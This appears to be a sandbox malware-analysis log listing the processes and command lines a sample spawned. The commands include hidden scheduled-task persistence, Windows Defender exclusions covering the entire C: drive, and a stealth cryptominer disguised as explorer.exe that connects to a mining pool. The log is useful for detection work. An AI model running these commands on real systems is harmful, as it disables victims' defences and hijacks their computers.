schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office16\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Templates\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\Refcrt.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QgayOGv9z8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\TextInputHost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'

C:\DriversavessessionDlldhcp\cmd.exe

"C:\DriversavessessionDlldhcp\cmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7j6Rve8VVr.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xtg3qeg\0xtg3qeg.cmdline"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE8.tmp" "c:\Users\All Users\Start Menu\CSCE598C95B4465A6B8FD381D8AE520.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wn1dimlu\wn1dimlu.cmdline"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA3.tmp" "c:\Users\All Users\Templates\CSC8CA6EBD2C43546EAB5B52DFFDCC19C51.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3pul1kr\a3pul1kr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4F.tmp" "c:\Users\Admin\Videos\CSC72B8F320E3DF4B698070F74431A6B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4fuoeov\d4fuoeov.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC.tmp" "c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1re5ehj\k1re5ehj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA7.tmp" "c:\Users\Public\CSC45678A7E34C649CB872DD19188FFFC30.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eyrjm1oz\eyrjm1oz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE53.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\giwyemor\giwyemor.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0E.tmp" "c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekas2xo2\ekas2xo2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCA.tmp" "c:\Users\Admin\Music\CSCAE9C26FC32F449829EAD734848684A57.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tw0wsu25\tw0wsu25.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1085.tmp" "c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0vpcczse\0vpcczse.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1131.tmp" "c:\DriversavessessionDlldhcp\CSCF9A40D7E7D05445BB6D15E59BA14ADE.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m4qu4ob\5m4qu4ob.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES120C.tmp" "c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 13 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SasmzD9Mi7.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Users\Admin\conhost.exe

"C:\Users\Admin\conhost.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp\Roblox.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.23.46:443 www.nodejs.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
